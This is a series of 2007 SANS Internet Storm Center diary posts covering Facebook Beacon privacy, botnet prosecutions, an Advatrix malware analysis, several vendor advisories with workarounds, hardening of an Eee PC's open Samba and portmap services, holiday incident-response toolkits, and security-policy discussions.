Published: 2007-11-30

Facebook, pr0n and privacy

No small amount of controversy has been raised about Facebook apparently tracking and making public the purchases users are making through online while logged into the Facebook site (even if they aren't doing it explicitly through facebook).  Without going into much repetition of what has been said elsewhere about the controversy (or repeating what I've said in another article I've written on the subject) or the specifics of tracking users in general, the interesting part of the controversy is that it was entirely preventable.  When users add applications in Facebook, it asks them if they want messages put in their profile and so forth and allows users to block feeds from being entered by other third-party sites, and there are additional privacy settings that would hide the feed regardless.  Instead of being responsible, users mindlessly clicked forth not bothering to think of the implications of what they were doing, put information out there that some didn't want out there, and now complain that someone didn't protect them from doing silly things.  What you say and do online can and will be used against you (ok, maybe I'm just a tad cynical there), and when push comes to shove, the only person that can protect their personal data is the person themselves.  And it's not just Facebook you have to worry about.

There are malicious porn sites out there being tracked by McAfee that use pop-ups to extort money from perusers of free porn and many also sell the personal information of their clientele.  I recall an incident investigation I did some years ago that pointed back to a porn site in Mexico that happily charged people for their wares, and then turned around and sold the credit card information legitimately given to them.  And it's not just unsavory websites that happily take user information quietly and use it for commercial purposes, big companies do it too (i.e. Google).

 The moral of the story is consumers need to be wary of how, when and to whom they give their personal information online.  For the more privacy conscious, check out Firefox extensions TrackMeNot and AdBlock Plus to trim down on the information you put online.

UPDATE 2011 UTC: Facebook has made some modifications to the tracking service (Beacon) so that users have even more of an opportunity to restrict that information.

UPDATE 2302 UTC: ISC Reader Ken pointed us to a nice writeup in using the Blocksite Firefox plugin to block the Facebook Beacon messages from working.

John Bambenek / bambenek (at) gmail [dot] com
University of Illinois


Published: 2007-11-29

Bot Roast II

The FBI announced today that since Operation "Bot Roast" was made public last June, eight individuals have been indicted, pled guilty, or been sentenced for crimes related to botnet activity. Additionally, 13 search warrants were served in the U.S. and by overseas law enforcement partners in connection with this operation. This ongoing investigative effort has thus far uncovered more than $20 million in economic loss and more than one million victim computers.  Round two of this effort, called "Bot Roast II" has resulted in:

  • Three new indictments, including two this past month. In one case, the FBI uncovered a denial of service attack on a major university in the Philadelphia area and then knocked out much of the botnet by disrupting its ability to talk to other computers.
  • Two previously charged criminals who pled guilty, including a California man who is a well known member of the botnet underground.
  • The sentencing of three others, including a pair of men who launched a major phishing scheme targeting a Midwest bank that led to millions of dollars in losses.

Well done, FBI, and keep at it! 

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2007-11-29

Treacherous malware: the story of Advatrix

Recently I spent some time analyzing a relatively simple BHO (Browser Helper Object) just to see what the bad guys were really doing with it.

The BHO was dropped by an executable, which was part of a bigger adware package pretending to be an anti-virus program (of course). The only dropped file by this dropper was actually the DLL used by the BHO which the dropper registered with the system.

After quick analysis I found out that the BHO captured queries for various search engines and other commonly visited web sites and submitted them to a third web site. That web site had a possibility of displaying various ads on the infected machine (when I tested the BHO that component did not work).

The list of sites that the BHO stole information from was impressive – there were almost 140 sites monitored. For every site, the BHO had information about exactly what to extract, so only the user’s query was sent and not the whole URL.

For example, for wikipedia.org, the BHO extracted the search= parameter, while for search.yahoo.com it extracted the p= parameter.

The extracted parameters where then submitted to a third site (which is not working any more) with the following request:


Two most interesting things in this request are the svPOPUP and svKEYWORDS arguments. The svPOPUP tells the ad site to display targeted ads, related to the keywords submitted in the svKEYWORDS argument. As you can probably guess, those are the search terms that the user entered.

This was all more or less standard, only the number of monitored web sites seemed pretty high – this BHO certainly had a serious impact on a user’s privacy.

After I searched the web a bit, I found out that Elia Florio from Symantec already described another variant of this same BHO which they called Trojan.Advatrix (Symantec's description is here). Besides the information I already had, that particular variant did something else to the machine. Something very, very mean.

Elia found out that the BHO modifies Internet Explorer so that it becomes vulnerable to two security vulnerabilities: MS06-014 known as the MDAC vulnerability and MS07-017, known as the ANI vulnerability.

These two vulnerabilities are probably the most exploited vulnerabilities in Internet Explorer today. The MS06-014 vulnerability is practically a part of every exploit pack today (and is certainly in MPACK, which is the most popular one). Exploits for the ANI vulnerability can also still be found almost everywhere.

What makes me extremely worried is how hidden this whole thing is. The BHO just modifies Internet Explorer’s image which means that no files are written to the disk. In other words, such a machine will look completely patched to Windows Update or any other patch checking system. However, while the BHO is active, the machine will be vulnerable to two most exploited client side vulnerabilities in last couple of years.

The last line of defense, the anti-virus program, is not particularly helpful here either. The dropper I had was detected by only 13 out of 32 AV programs on VirusTotal and the DLL detection was even worse with only 7 AV programs detecting it.

While there are many lessons to learn from this malware, I would like to stress out one really important thing: when a machine gets infected, your only option is to reinstall it from scratch. With today’s malware phoning home and installing stealth, updated modules, this is really a no brainer.




Published: 2007-11-28

Google Search Campaign

Computerworld is reporting a "large scale, coordinated campaign to steer users toward malware-spewing Websites from Google search results is under way."  

  • They are quoting approximately 40,000 pages may be hosting malware. 
  • 27  different domains are involved.
  • Each with up to 1499 malicious pages.
  • Tactics Used per Sunbelt:
    • "comment spam" - bots hide in comment sections with links
    • "blog spam" -bogus blog posts
    • plug links into any web form requesting a link

Please let us know if you are seeing this activity via our contact page.

Thanks, Mari Nichols



Published: 2007-11-27

Reader submitted question on Social-Engineering

As you can imagine, here at the ISC we get thousands (tens of thousands?) of user submitted questions and suggestions.  Let me tell you what, we appreciate it.  It's what binds the galaxy together. (TM)

But we had a user submitted question today that I found particularly interesting.  Jim wrote in asking us:

"I am looking for some good policies and practices to help my help desk avoid falling victim to social engineering.  I looked around on SANS and other sites but find little more than asking a few questions to verify identity.  We are also considering a callback as a auditing step.  What do you think?"

So what DO you think readers? 


Joel Esler



Published: 2007-11-27

Lotus Notes buffer overflow in the Lotus WorkSheet file processor

Core Security has put out a new advisory concerning a buffer overflow in Lotus Notes. Both remotely and locally exploitable.

Core lists the vulnerable software pieces as:

- Lotus Notes version 7.x
- Lotus Notes version 8.x (not confirmed by Core)
- Lotus Notes version 6.5.6 (not confirmed by Core)
- Other software packages using Verity KeyView SDK using vulnerable
versions of l123sr.dll

Although it's prudent to keep in mind that as of now 8.x and 6.5.6 are NOT confirmed by Core (as in their advisory, and the cut and paste above).

Cut and Paste from Core's Advisory:

Lotus Notes customers should follow the instructions of the following
support Technote, which outlines the available options based on specific
versions of Lotus Notes:


Workaround 1: Delete the keyview.ini file in the Notes program directory.
This disables ALL viewers. When a user clicks View (for any file), a
dialog box will display with the message "Unable to locate the viewer
configuration file.".

Workaround 2: Delete the problem file l123sr.dll file. When a user tries
to view the specific file type, a dialog box will display with the message
"The viewer display window could not be initialized." All other file types
work without returning the error message.

Workaround 3: Comment out specific lines in keyview.ini for any references
to the problem file (l123sr.dll). To comment a line, you precede it with a
semi-colon (;). When a user tries to view the specific file type, a dialog
box will display with the message "The viewer display window could not be
initialized". For example:

Workaround 4:  Filter inbound emails with attachments with potentially
malicious files.  Lotus 1-2-3 files are usually associated to MIME
Content-Type headers set to the following strings:
Note however that workaround #4 is a simply stop gap measure that could be
circumvented by relatively unsophisticated attackers.


Joel Esler



Published: 2007-11-27

Time to update your Firefoxes! (Firefox

There's a new update for Firefox out.

Copy and Paste from Mozilla.org on the updated security features:

MFSA 2007-39 Referer-spoofing via window.location race condition
MFSA 2007-38 Memory corruption vulnerabilities (rv:
MFSA 2007-37 jar: URI scheme XSS hazard


Joel Esler



Published: 2007-11-26

With popularity comes responsibility

There has been a considerable growth in online collaboration tools. Wiki's are an excellent example of these, and the growth of their use has been dramatic.

However, this success can lead to logistical issues when security advisories are released. Today we have had a reader contact us with a plea to help alert users of TikiWiki that there are exploits being actively attacked.

The TikiWiki team have been working hard on fixing a number of reported vulnerabilities with their Wiki. However it is the site administrators that have been slow to update their systems.

Mose from the TikiWiki project has been very helpful in highlighting that they are working on a new administration pane within their application which will alert administrators to new releases being available. Until then, if you are using TikiWiki, please update to the latest release. For details go to : http://info.tikiwiki.org/tiki-index.php


Published: 2007-11-26

Apple QuickTime 7.3 RTSP Response 0day

Thank you all for writing in!!  We appreciate it, things have been a little crazy around the ISC today, so we haven't been able to throw some stuff up on the diary about the Quicktime bug.  (We've had to wake everyone up, they all ate turkey..tryptophan... it's not pretty, anyway...)

As outlined by Secunia, Apple's Quicktime 7.2 and 7.3 has a overwrite condition via incorrect rtsp parsing.  Check it out here

There are several things you can do until this gets patched (just remember to undo them after you patch!).

1) Block the RTSP protocol.  Ports are 554/tcp and 6970-6999/udp.

2) Set the Killbit for Quicktime CLSID's:


There are some other recommendations over at the US-CERT site.  But like I said, remember to undo them after the patch, or you will be wondering why things aren't working with your Quicktime streams. 

Please remember that Quicktime is a component of iTunes...

Joel Esler



Published: 2007-11-25

Gadget Security

Last week I got my xmas gift...:) A Eeepc, (see wikipedia on it).

Basically, it is a small laptop (7'' screen), running a linux version, called XandrOS
(debian based), with a quite user-friendly interface, mostly for internet applications.

Well, it is quite good, and I am really liking it, but, of course, I had to try its security :).

Fortunately it allows you to get a console, which allows you to instantly get a root access, by issuing 'sudo bash'.
Well, this is not good, since if anyone can get it, it can change the root password, maybe letting you with the
unique alternative, restoring the system. So changing the config to ask for password is a ‘must do’, imho...:)

But let’s go to interesting stuff.
I was curious to see which ports were open using nmap from a remote host on it.

That was the result:
The SYN Stealth Scan took 0.61s to scan 1239 total ports.
Host appears to be up ... good.
Interesting ports on
Not shown: 1236 closed ports
111/tcp open  rpcbind
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap finished: 1 IP address (1 host up) scanned in 1.525 seconds

Hum...port 111, 139 and 445...139 and 445 are usually associated with Windows Systems, but we are on a Linux.
Also port 111, this is portmap...

So lets dig a little more. Using smbclient to query our remote system:

lab3:~# smbclient -N -L '\\'   (-L to list and -N for no password)
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.24]

        Sharename       Type      Comment
        ---------       ----      -------
        IPC$            IPC       IPC Service (eeepc-root server (Asus Eee PC))
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.24]

        Server               Comment
        ---------            -------
        EEEPC-ROOT           eeepc-root server (Asus Eee PC)

        Workgroup            Master
        ---------            -------
        GRUPO                SRVWIN1
        MSHOME               PEDROLAP
        WORKGROUP            EEEPC-ROOT

On my opinion this is too much information to be shared...
Here we have the information that the EEEPC is running Samba (that explains the port 139 and 445), the SAMBA version (3.0.24) and some groups and shares info...

On port 111, nmap says portmap, so lets check it with rpcinfo:

rpcinfo -p

lab3:~# rpcinfo -p
   program vers proto   port
    100000    2   tcp    111  portmapper
    100000    2   udp    111  portmapper

Yes, portmap!

On our local system, we can check those with netstat -anp:
lab3:~# netstat -anp

Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0   *               LISTEN     2339/smbd       
tcp        0      0   *               LISTEN     1409/portmap    
tcp        0      0 *               LISTEN     1398/cupsd      
tcp        0      0   *               LISTEN     2339/smbd                      
udp        0      0*                          2337/nmbd       
udp        0      0   *                          2337/nmbd       
udp        0      0*                          2337/nmbd       
udp        0      0   *                          2337/nmbd       
udp        0      0    *                          2157/dhclient3  
udp        0      0    *                          1613/dhclient3  
udp        0      0   *                          1409/portmap    
udp        0      0   *                          1398/cupsd      

Again, samba (smbd and nmbd) and portmap (sunrpc). Also, we can see Cups (used by printer).

Now, we could try to create some iptables rules to restrict access, but the iptables modules are not loaded...:(

Another alternative is to shut it down.

Since it is a debian-based linux, this could be easily done with:

/etc/init.d/portmap stop
/etc/init.d/samba stop

but it will only stop them for the current session. If you reboot it, they will be back...

Another option is to edit the file in /etc/hosts.deny and add the line

to restrict access to this service.

Or even disable it, by commenting the deamons from the usr/sbin/services.sh file.


Again, I am not saying that letting these services open will mean that you will be hacked or so, even because I am not aware of any recent vulnerability on them, but we are at least giving too much information...


This is just one example of how our new gadgets can expose ourselves. New smart phones, linux, windows based can also expose you and your data, and as we are using them to store lots of our data, we must be paranoid on their security measures...at least I am...:)


Ah, about my eeepc...it is not McDonalds, but "I am loving it!" :) All my security tools were installed perfectly on it...;)



Handler on Duty: Pedro Bueno ( pbueno //&&// isc. sans. org)



Published: 2007-11-24

Policies - Need them, sure, how do we get them approved?

As I was reading Deb's article yesterday about our need for policies, my first thought was yes, of course we need policies!  We are able to write all the policies we want, but how do we get them approved?  Do we break the policies down into smaller sections for faster approval?  Or do we publish one "Acceptable Use Policy" and hope that covers us with our employees?  Do we ask for volunteers for a policy committee?  Do we forget about setting standards and just get general network usage policies approved?

Policies, procedures and standards are necessary for multiple reasons.  One of the key reasons is to set the record straight for the users of our systems and our system administrators setting up the systems.  We need to set the limits on what they can and cannot do.  Do you even know where you stand?  Do you know what is "acceptable risk" for your organization?  Would you have the budget to put behind the policy if it were approved?

Remember to utilize your legal department and internal audit department (if you have them) as assistance in getting justification. We all know that being able to provide proper documentation plays a key role during litigation, outside attack or insider related. These people will help you get the ball rolling in the right direction, if you need help.

If and when you get your policy approved, how often should you revisit and revise?  Did you set these time tables into the policy or just thank the digital stars that you finally got sign off?  We would like to hear your policy battle stories.  Please send any lessons learned from your policy process to us here.  I'm looking forward to learning some new techniques.

Fair Winds,





Published: 2007-11-23

Data Policies - Do we need them?

Corporate IT departments spend millions of dollars to secure the perimeters of their networks. Firewalls, gateway filtering, intrusion detection systems and monitoring services are some of the methods used to keep hackers and malicious code exploits out. Yet their data may still be getting compromised and they don't know it.  In today's age of mobile technology the data maybe leaking out unintentionally. 

In the past the policy was pretty simple: everyone uses VPN and two factor authentication. Today many corporations use Intranet's and Internal Web Pages to store and access data.  This makes it handy for the worker who travels and works on the road.  However, if the employee isn't thinking about the security of the company data, if the employee hasn't been trained in the methods needed to secure the data, the company can experience a data leak. For instance,  if the employee checks their email or accesses these internal websites from a public terminal in an airport, Internet Cafe, Hotel, etc, what data is left behind? Who could be "shoulder surfing" and watching them work?  What about programs planted on these machines that can track all of the information entered (including userid and password information)? If you look at programs like WebWatcher and Spector Pro, you see how easy it may be to capture everything from a public terminal.  Because of programs such as these, should corporations have policies against use of public terminals to access company information?

What about the information posted in public tech support sites or blog sites?  Is too much information being revealed online in insecure locations?  Many self help tech support sites are available on the Internet.  There is a wealth of information available and a huge community of "experts" available online.  This can be a great thing.  However, is proprietary or critical company information being posted in these sites?  It is interesting to see the amount of information about their company, systems and network people are willing to share in these exchanges without even realizing that they have just given the bad guy the "key to the door". 

Do corporations/companies, (large and small) have policies and procedures in place to minimize the amount of information leakage their company experiences?  How do we educate and train our employees to think about what they are doing and how it will impact the company? 

SANS Institute has a significant number of resources and templates available for you to start the process of identifying and developing Policies and Procedures.   www.sans.org/resources/policies/  This is a good starting place and has some really good templates for a number of security related concerns.

We would like to know if you have a particular policy or procedure that you would like to share with us or if you have good online resources you can recommend.


Published: 2007-11-22

Russian Business Network - Additional Analysis

One of our readers, David Bizeul, spent the past three months researching the Russian Business Network (RBN).  The RBN is a virtual safe house for Russian criminals responsible for malicious code attacks, phishing attacks, child pornography and other illicit operations (we previously provided an analysis of the RBN that was produced by iDefense.)  The 70-page paper is on David's web site, and David said that he may update it in the future.  We are mirroring the paper for him just in case his site gets overloaded.  David's contact information is in the paper so if you like what you see please let him know.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2007-11-22

Holiday Shopping - Give Some Security

Happy Thanksgiving to all of our USA readers!  For most countries, this weekend coming up is the start of the holiday season.  For many retailers, tomorrow (Friday November 23rd) is "Black Friday" and recently there's been the introduction of "Cyber Monday" (Monday November 26th) when everybody comes back to work and uses their office computers to go shopping online.  However and wherever you shop, and whatever your customs and traditions are, as we enter another holiday season it's time once again to think about computer security for our family and friends.

This is a golden opportunity for information security professionals around the world to spread the word about security and to "give some security" when you exchange presents later this year.  Let us know what you plan to give as a security gift to your friends and families.  Do you know of any cool ideas that other readers might like?  Did somebody give you something last year that really helped you with security?  I doubt that grandma would appreciate a copy of Hacking for Grannies Exposed but I'm sure that there is something on the shelf that would be good for her in a security sense.  Please use our contact form to let us know your plans to "give some security" this year.  We'll post the best ideas here later in the day.


Art wrote us with a good idea: instead of buying security stuff, he is making CD's for friends and family.  He'll put free stuff on them, FREE AVG, Spybot Search and Destroy, and links to other downloads in a .txt file such as Windows Defender.  He said it's not a gift for them, it’s for him.  Less headaches, he said.  He also suggested a gift his wife might consider, a Cisco PIX.  Nice touch, Art!  I hope that Santa is nice to you.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2007-11-21

Social Engineering, just by asking!

A reader wrote in to tell us about a spam he received that read like this:

"I'm a computer engineer at Islamic University of Gaza(IUG), the network of my university hacked in the last few months , now I design a secure model to repair the network security system in IUG but my experience still little, so I hope that I can obtain a diagram or flowchart or map of  your university network security system to study it and see how can apply it in IUG system."

I guess that's a good way of getting information about your network innards instead of hacking it "hey, can you just send me your visio diagram!?  That'd be great, kthnkx!"


Gotta watch out for that Social Engineering.  It's the basis of all those bank, visa, mastercard, etc.. spams.  Phishes, and whatever other things are out there now-a-days.  Counting on a "uneducated" user to click and fill out some information.

Joel Esler



Published: 2007-11-21

Security 2.0

Been thinking lately about some of the restrictive policies that corporations, .mil, .gov, and some others have when it comes to security.

Does it work?

Where are we at?  

Are all the extremely restrictive policies in your corporate work environment working?  

What can be relaxed?  Why?


Example:  I recently ran across an example where iTunes was not allowed on the network because it was considered P2P.  Is iTunes P2P?  Of course not, but here is an example of where reeducation for the "experts" and the loss of "policy for policy's sake" make be helpful.


We'd like to hear your feedback.  What does Security 2.0 mean to you?  We all have our own opinions, we'd like to hear yours!


Joel Esler



Published: 2007-11-20

“There is nothing on my computer that a hacker would be interested in”

“There is nothing on my computer that a hacker would be interested in.”

How often do you hear that statement as a key point in someone’s defense strategy? It is something I’ve often heard in social outings and family gatherings.

I try to use it as an opportunity for security awareness. First rephrase the statement to by: “There is nothing on my computer that a criminal would be interested in.” This takes the conversation away from the contentious “what does the word, hacker, mean” question/debate. If you focus on protecting yourself form criminals, you stand a pretty good chance against hackers/crackers as well (should you feel there is such a distinction or not.)

What makes up an abstract computer system on the Internet?

  • CPU
  • Memory
  • Hard Drive
  • Internet access/IP address
  • User data

So what would a criminal be interested in on this average computer?

CPU: botnets often use their slave machines to send email, proxy web traffic, and launch denial of service attacks. These all use slices of CPU on the machine to do work that they would otherwise not have the resources to do.

Memory: User’s browsing habits, username/password credentials, and other sensitive user data is captured out of memory.

Hard Drive: I have seen bot-nets that perform no other service than act as a giant library to store pirated films and audio.

Internet access/IP address: every new IP that isn’t already on a blocklist is of interest to spammers. Criminals can host malicious websites on a machine to avoid other blocklists. Criminals can proxy their traffic through a machine hide their true location and avoid some companies’ firewalls blocking known-bad IPs.

What about User Data?

Everyone knows that criminals are interested in your banking and paypal credentials. They are also after your eBay passwords so they can sell stolen goods in your name. They are after your facebook, and myspace credentials so they can post links to malicious websites (look at Dancho Danchev's post today for an example.) They’re after your email address. Even by itself a working email address is worth money. Take a person’s address book and you get their social network that can be used to launch targeted email attacks. Your email address is often used as your account name on a number of web services. It’s arguable that you can correlate more about a person based on their email address than their Social Security Number anymore.

Executive Summary

So you may think there is nothing of interest on your machine, but there are certainly things of value on your system. Criminals know how to “make it up in volume.”


Published: 2007-11-20

Holiday/Family Incident Response

Holiday/Family Incident Response Why and How

Apologies in advance that this is Windows-centric.

Many of us are going to visiting with friends and family over the next couple of months while celebrating a number of year-end holidays.  Often, we are tapped for on-site tech-support duty in exchange for holiday treats.

Yesterday George posted a request for what's in your holiday/family incident response toolkit.  Overnight I collected the response in the hopes to present a useful and organized list.

Incident response under these conditions can be way harder than what one encounters at their day-job.  The builds are non-standard, there are rarely backups to rely on, the data are irreplaceable (personal financial data, photographs, genealogical project, etc.)  The stakes are often higher.

The response methodology is similar to what you'd run into at work:

  • Preparation
  • Detection/Identification
  • Containment/Eradication
  • Lessons Learned/Prevention


Hopefully that was done last year when you put on AV, firewalls, and anti-spyware.  This year, the root-kit detection tools are more widely available so it's a good time to update your jump-kit and your framework


The first step is an interview with the machine user.  You should ask things like:

  • "Have you patched recently?"
  • "Is the machine running slowly?"
  • "Getting a lot of pop-ups?"

Follow the interview with an inspection to verify that the AV is present, running, and up-to-date.  Ensure that the OS is fully patched.  Peek at the hosts file.  See if there is reason to suspect that the machine is compromised before you start tearing into it.


Should you determine that the machine has been compromised, it is time to start backing up the important files off of the machine.  The only sure approach to cleaning a system is to rebuild it.  There were many spyware/virus cleaning tools submitted, but I consider them useful only in the Identification phase to determine if the machine has been compromised.  I personally do not recommend them for reliable system cleanup.

Lessons Learned/Prevention

If the system was properly secured last time, and no ill has come of it, then congratulations.  But your work is not over.  This final stage is the most important stage in incident response.  Go over what you found in your investigation, point it out, and provide a solution.  No Anti-virus?  Put one on.  No backups?  Make one.  Firewall not enabled?  Enable it.  This is the point where you provide additional instructions, set-up an ongoing tech-support option (if you're brave/generous enough,) and suggest alternatives (say, move them from IE7 to Opera or Firefox-- which have their own issues so you have to carefully consider the consequences of that.)

The Tools

I broke the tools down into the following categories:

  • Frameworks - how one deploys the tools to the system
  • Anti-Virus
  • Anti-Spyware
  • Anti-Rootkit
  • Backup
  • System Analysis
  • Malware Analysis - a subset of System Analysis tools focused to analyzing the malware
  • Network Analysis
  • Registry Cleanup
  • Remote Support
  • Patching
  • Browser protection

CD vs. USB

How should you transport your tools to the site?  There are a lot of good arguments supporting the use of burned CDs and USB drives. 

CD pros:

  • Inexpensive
  • You can leave copies behind for them to use
  • It's hard to infect them

CD Cons:

  • Capacity - a trade-off can be made between capacity and expense by switching to DVD

USB pros:

  • Capacity
  • Flexibility - you can write to them
  • Make nice gifts

USB cons:

  • Risky, if you don't write protect them
  • Costlier than CD/DVD media


Of course one can simply run from the CD or USB on the live system.  In some cases this is the best first step, especially if you suspect something like a botnet running on the system.  Live incident response can quickly identify that the machine is compromised and provide you with the code that's causing the traffic right away (see below for the System Analysis tools one can use in these cases.) 

Others prefer to work from a boot-disk when analyzing a system, particularly when a root-kit is suspected.  These came in two varieties, Windows-based and Linux-based.

 In the windows-based options, people recommended:

For Linux-based options try:


These tools can be used for an initial assessment of the system.  One (or more) of these should be left installed on the system when you leave.  There are plenty of great commercial solutions.  I'm only listing free solutions today:


Like anti-virus tools, these play a role in initial assessment of the system, and should be installed on the system when you leave it for added protection.


We did not have a lot of these tools last year.  They may turn up things that aren't showing up in your other scans.

The guys over at RaDaJo (RAul, DAvid and JOrge) Security Blog have an article inspired by George's post featuring Anti-Rootkit tools: http://radajo.blogspot.com/2007/11/anti-rootkit-windows-tools-searching.html.


Burning a copy of irreplaceable photos and other documents to CD/DVD is time well spent, regardless if  the system is compromised and needs to be reinstalled or not. They will likely not regret the time put into this important defense measure. Reader Robert suggests that you can avoid a lot of drag and drop effort by using Areca (http://areca.sourceforge.net/.)

System Analysis

There are a tremendous amount of little programs that can give you an eye into what is going on in the system.  These are used during the live response stage of your Holiday/Family incident response.  Hijackthis was the overwhelming favorite, followed by huge support of the Sysinternals tools.

Use of these tools can occupy a lot of your time and require a fair amount of experience.  Russ has offered a helpful write up for a Rapid Malware Response/Analysis process (http://holisticinfosec.org/publications/MalcodeAnalysisTechniquesForIH_McRee.pdf.)

Malware Analysis

These tools were offered up to take a closer look at the malware that has been found on the system.  Using these requires a larger investment of time than many people have while visiting.  But for future use, these tools might be handy to have on your own incident response toolkit.

Network Analysis

It is sometimes easier to determine if a system is compromised by looking at the network traffic leaving the system.  Especially if you're familiar with protocol analysis.  Commonly suggested tools were:

Registry Cleanup

A few tools were submitted that promise to clean up the registry and other system files to improve system performance.

Remote Support

Some brave and generous people offer remote tech support to their families.  They have recommended:

  • LogMeIn
  • PCAnywhere
  • VNC

It is not something that I would recommend or personally do.  For selfish reasons, I don't look forward to late night tech support phone calls from Aunt Minnie.  Nor do I like opening up a remote control panel on a machine that I'm trying to protect.

Patching Support

This was the focus of last years post (how to get all of the updates for Grandma's PC together.)  The Offline-Update project (http://www.heise.de/ct/projekte/offlineupdate/download_uk.shtml) promises to solve the problem of building your own CD or USB to patch your relatives' machines that have only dial-up connections to the internet.  But what about all of those applications on the system?  Attacks are moving from OS vulnerabilities to leveraging vulnerabilities in applications like audio players and PDF readers.  Secunia offers a program that can inventory and assess the applications installed on the system.  Details of this is available at: https://psi.secunia.com/.

Browser Protection

Many submissions suggested that they move the user from using IE over to Firefox or Opera.  Also, they suggested using McAfee's Siteadvisor (http://www.siteadvisor.com/) and Netcraft's Toolbar (http://toolbar.netcraft.com/.)

Other protection methods

Kevin Liston (kliston at isc dot sans dot org)


Published: 2007-11-20

Mystery Packets, Protocol 139

I am just on vacation at my parents place, and while doing some network maintenance, I came across these two mystery packets:

17:07:17.405771 IP >  ip-proto-139 30
	0x0000:  4500 0032 0003 0000 ff8b 8c57 c0a8 b2ff  E..2.......W....
	0x0010:  ffff ffff 0100 0200 0000 0000 0000 0000  ................
	0x0020:  0000 a2c0 d297 bcc3 6c40 1ad5 d0bf 382a  ........l@....8*
	0x0030:  ab63                                     .c
17:07:17.406835 IP >  ip-proto-139 30
	0x0000:  4500 0032 0001 0000 ff8b 8c57 c0a8 b2ff  E..2.......W....
	0x0010:  ffff ffff 0100 0100 0000 0000 0000 0000  ................
	0x0020:  0000 1b3c 90a3 4ac1 50b7 930a b723 a181  ...<..J.P....#..
	0x0030:  431a                                     C.

A bit about the network: 3 PCs, 2 Macs running Leopard. Each Mac runs vmware with Windows XP. All the PCs run Windows XP. There is a "FritzBox" DSL router. Part of the network is wireless. Other then that, there isn't that much special about the network. The hosts run firewalls which are pretty much open locally.

No idea so far why these packets show up. Kind of looks like they are corrupted netbios packets (port 139 > protocol 139?). But why broadcast like this? Please let us know if you have any ideas.

Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2007-11-20

Guest Editorial: Internet Governance Forum (Gadi Evron)

From time to time, we will allow non handlers to submit editorials to be published in our diary. The editorial below was submitted by Gadi Evron. If you are interested, please send a quick proposal via our contact form.

The IGF (Internet Governance Forum) is an annual UN conference on Internet governance which was held this year in Rio de Janeiro, Brazil. The topics discussed range from human rights online to providing Internet access in developing countries. A somewhat secondary topic of conversation is Internet security and cyber-crime mostly limited to policy and legislative efforts. Techies and our industry don't have much to do there, but I have a few updates for us from the conference.

One of the main problems the Internet security operations community faces is that although global encompassing incident response and information sharing is happening, it is on the technological and operational levels. We mostly do not know how to communicate with the policy makers. Some of us present there made head-way in the hallways (as the sessions are mostly just repeated talk).

I spoke with Dr Hamadoun Touré, the Secretary General of the ITU on some of our efforts and some of our operational needs, and was pleased to find an open mind and sincere interest. The ITU, at least as far as I understood, is concerned with Internet security, and appreciates the importance of the operational communities and the work we do.

On a surprised note, China ran a few security sessions in which its' delegates have shown high visibility into Internet security and abuse in China, speaking of issues of establishing trust and incident response statistics. They are highly concerned with spam, and are the only ones to have spoken in an operational manner. They quoted numbers from (mainly) US sources that showed spam and abuse activity in China, then they indicated a drop of spam being sent from the Chinese network (spam is of key importance to them in their presentations).

On the other hand they presented an increase in phishing and botnet incidents being reported. In one slide they showed numbers on phishing reports, sorted by top-reporters. The top-5 reporters were: Verisign (probably iDefense), RSA (probably Cyota), eBay (probably eBay), CastleCops (Probably PIRT) and MarkMonitor.

But wait, there's more. The Chinese delegation also discussed mitigation success rates. In phishing, out of over 600 sites reported in one time period they mitigated just over 200. They were sinciere and open on where they have to get better and to be honest, I was in awe from them, a country I considered to be a black hole of abuse reports. We made some new contacts and hope these will prove fruitful for future cooperation. I am highly impressed with the people I met from China..

Another subject of interest to me was my discussion with Milton Mueller on his advocacy of some information being removed from publicly accessible WHOIS data. Although ideologically I am with him on this privacy issue, practically it is the only, granted very poor, way for the Internet security operations community to take down abusive domain names today, through registrars, and the Internet can't do without it until another option is presented. I hope to work with him on solutions to this conundrum.

My lecture there was one I only found out I was giving a about a month ago after being contacted by a member of ICANNs SSAC. It was a part of the Case Studies session from the Diplo foundation ( http://www.diplomacy.edu ), where I spoke, technically, of lessons from the Estonian Internet war and how countries can defend themselves, as written in the post-mortem analysis and recommendations I wrote for the Estonian CERT. In the questions section we spoke of the importance of CERT organizations, how they are established and on the differences in fraud as seen in different parts of the world. My fellow session members were: Robert Guerra (Canada, session moderator), Veronica Cretu (Moldova, facilitator), and the other panelists: Olga Cavalli (Argentina) and Cristine Hoepers (who manages the Brazilian CERT). I, of course, am from Israel and work for Afilias Global Registry Services.

Gadi Evron,


Published: 2007-11-19

The Holidays Cometh

Robert posed a question to the handlers that I think everyone should weigh in on :

"It is becoming time for the holidays. That means geeks spending time with families. That means geeks need to pack tools for malware cleanup. Do you guys have a CD list of tools and or procedures? This might be worth making a post about."

Being somewhat cloistered in my job, and having a couple of young advocates at home (my 14 y.o. installed her own stripped-down *nix on her laptop, the 11 y.o. asked for help with his) I don't get to stay on top of the latest Windows and Mac malware detect/remove/recover tools. As a result, while my personal faves are useful to me, they'll no doubt seem too slow/dumb/technical/esoteric/2004 for others.

What is in your holiday jump bag? Let us know at https://isc2.sans.org/contact.html and we'll post the most popular response essentials.



Published: 2007-11-18


Tomorrow, it will be a year since we first ran an analysis of the ZLOB family of trojans in the ISC diary.  The write-up from back then is still an interesting read. While investigating today a few .edu sites with links to the latest ZLOB variant, it occurred to me how different these pages were compared to one year ago:  Yes, there was obfuscation of JavaScript. But not too much - certainly not enough to cause any virus scanner to reject the page outright. Yes, there were the sleazy links, thousands of them, interlinking the pages to cause a good ranking in search engines. But there were none (none!) of the embedded IFRAMES with the latest collection of browser- and application exploits that such pages used to contain in the past, Zlob or not.

Thinking it over, this sort of makes sense: if you want to trick a user into (voluntarily!) downloading and installing a piece of malware that claims to be a video codec, you probably don't want to scare the user away from the sites that draw him into the spyderweb by having other malware or exploit attempts lighting up the user's anti-virus.  The Zlob approach of propagating malware seems to have been quite successful for the bad guys: Not only are they still "going strong" more than a year after the first report, they also branched out to include Mac-OSX (diary) earlier this month.

